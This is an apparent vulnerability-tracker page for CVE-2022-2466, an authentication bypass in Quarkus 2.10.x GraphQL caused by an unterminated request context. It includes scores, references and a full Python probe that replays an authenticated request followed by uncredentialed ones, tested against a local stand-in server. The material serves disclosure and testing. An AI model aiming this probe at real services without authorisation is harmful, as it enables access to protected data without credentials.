CVE-2022-2466

CRITICAL

Quarkus 2.10.x - HTTP Request Context Not Terminated, Leading to Authentication Bypass via GraphQL

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2022-2466. The PoC was published by yuxblank.

AI-analyzed exploit summary: This PoC demonstrates an authentication bypass vulnerability in SmallRye GraphQL (CVE-2022-2466) where the request context is not properly terminated, allowing unauthorized access to GraphQL endpoints. The exploit involves sending a valid JWT token followed by a request without authentication, which incorrectly succeeds due to improper context management.

Description

It was found that Quarkus 2.10.x does not terminate the HTTP request header context, which may lead to unpredictable behavior.

Exploits (1)

nomisec · Working PoC · 1 star
by yuxblank · poc
https://github.com/yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL

Classification
Working PoC: 90%
Attack Type: Auth Bypass
Complexity: Moderate
Reliability: Reliable
Target: SmallRye GraphQL (Quarkus)
Auth required: yes
Prerequisites: Valid JWT token for initial request · Access to GraphQL endpoint
Analyzed by devstral-2, Feb 16, 2026
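The two-request sequence the exploit summary describes, as an added example that is not the yuxblank PoC and not Quarkus or SmallRye code. The probe sends one GraphQL request with a bearer JWT and then several requests with no credentials over the same keep-alive connection, and reports whether any of the uncredentialed requests was served. The target here is a constructed stand-in server that models the flaw as a per-handler identity slot that is not reset when a request ends; the /graphql path, the bearer-token header, the placeholder JWT and the "stay on one connection, send several follow-ups" strategy are assumptions for the example, not statements from the page.

```python
"""Probe for the behaviour the exploit summary describes: one authenticated
GraphQL request, then unauthenticated requests on the same connection that
should be rejected but are served if the request context leaked.

Added example, not the yuxblank PoC. Assumptions not taken from the page:
the GraphQL endpoint lives at /graphql, the JWT is sent as a bearer token,
and the target is a small stand-in server (below) that models the flaw as a
per-handler identity slot that is never cleared between requests.
"""
import http.client
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample query; any query behind an authorization check would do.
QUERY = json.dumps({"query": "{ secret }"})
# Constructed placeholder; the stand-in server does not validate it.
DUMMY_JWT = "eyJhbGciOiJSUzI1NiJ9.constructed.placeholder"


def probe(host, port, token, path="/graphql", followups=3):
    """Send one request with `Authorization: Bearer <token>`, then `followups`
    requests with no credentials, all over one keep-alive connection.  The
    leaked context belongs to whichever worker served the first request, so
    staying on one connection and sending several follow-ups raises the odds
    of hitting it (an assumption of this example, not a claim from the page).
    Returns (status of the authenticated request, list of follow-up statuses)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    headers = {"Content-Type": "application/json"}
    conn.request("POST", path, QUERY, {**headers, "Authorization": "Bearer " + token})
    first = conn.getresponse()
    first.read()
    later = []
    for _ in range(followups):
        conn.request("POST", path, QUERY, headers)
        resp = conn.getresponse()
        resp.read()
        later.append(resp.status)
    conn.close()
    return first.status, later


def is_vulnerable(first_status, followup_statuses):
    """Verdict: the credentialed call worked and at least one uncredentialed
    call was served as if it were still authenticated."""
    return first_status == 200 and 200 in followup_statuses


class StandInGraphQL(BaseHTTPRequestHandler):
    """Constructed stand-in, not Quarkus or SmallRye code.  `identity` stands
    for the per-request security context; `vulnerable=True` skips the reset
    at the end of each request, which is the defect being modelled."""
    protocol_version = "HTTP/1.1"  # keep-alive, so the probe can reuse one socket
    vulnerable = True
    identity = None

    def do_POST(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))
        cls = type(self)
        auth = self.headers.get("Authorization", "")
        if auth.startswith("Bearer "):
            cls.identity = auth[len("Bearer "):]  # no real JWT check in this model
        if cls.identity is None:
            self._reply(401, {"errors": [{"message": "Unauthorized"}]})
        else:
            self._reply(200, {"data": {"secret": "visible to " + cls.identity}})
        if not cls.vulnerable:
            cls.identity = None  # the fix: terminate the context when the request ends

    def _reply(self, status, payload):
        body = json.dumps(payload).encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def run_against_stand_in(vulnerable):
    """Start a stand-in server on a random loopback port, run the probe, stop it."""
    handler = type("Handler", (StandInGraphQL,), {"vulnerable": vulnerable, "identity": None})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return probe("127.0.0.1", server.server_address[1], DUMMY_JWT)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for mode in (True, False):
        first, later = run_against_stand_in(mode)
        print("stand-in vulnerable=%s: auth request %d, follow-ups %s, verdict %s"
              % (mode, first, later, "VULNERABLE" if is_vulnerable(first, later) else "ok"))
```

Against a real instance, point probe() at the host and at a token the application actually accepts; a 200 on any follow-up is the finding. The stand-in exists only so the vulnerable and fixed outcomes can be seen side by side: with the reset in place the follow-ups come back 401.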

References (1)

Core References (1)
https://github.com/quarkusio/quarkus/issues/26748 (Exploit, Issue Tracking, Third Party Advisory; x_refsource_misc)

Scores

CVSS v3.1 9.8
EPSS 0.1278
EPSS Percentile 94.2%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

CWE
CWE-444
Status published
Products (2)
io.quarkus/quarkus-core-parent 2.10.0 - 2.10.4 (Maven)
quarkus/quarkus 2.10.0 - 2.10.4
Published Aug 31, 2022
Tracked Since Feb 18, 2026